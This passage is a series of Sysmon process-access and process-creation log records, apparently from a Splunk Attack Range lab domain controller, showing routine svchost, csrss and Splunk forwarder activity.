{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6422,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-00102AC00200}\r\nTargetProcessId: 2500\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-00102AC00200}","TargetProcessId":"2500","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6423,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6424,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010E2FD0200}\r\nTargetProcessId: 3520\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010E2FD0200}","TargetProcessId":"3520","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6425,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001054890300}\r\nTargetProcessId: 2780\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001054890300}","TargetProcessId":"2780","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6426,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010797B0400}\r\nTargetProcessId: 4264\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010797B0400}","TargetProcessId":"4264","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6427,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-108F-5F25-0000-0010BFB50400}\r\nTargetProcessId: 4600\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-108F-5F25-0000-0010BFB50400}","TargetProcessId":"4600","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6428,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6429,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.496\r\nProcessGuid: {E2A3D6B1-123C-5F25-0000-0010863D0900}\r\nProcessId: 4992\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.496","ProcessGuid":"{E2A3D6B1-123C-5F25-0000-0010863D0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6430,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.495\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-123C-5F25-0000-0010863D0900}\r\nTargetProcessId: 4992\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.495","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-123C-5F25-0000-0010863D0900}","TargetProcessId":"4992","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6431,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.495\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-123C-5F25-0000-0010863D0900}\r\nTargetProcessId: 4992\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.495","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-123C-5F25-0000-0010863D0900}","TargetProcessId":"4992","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6432,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 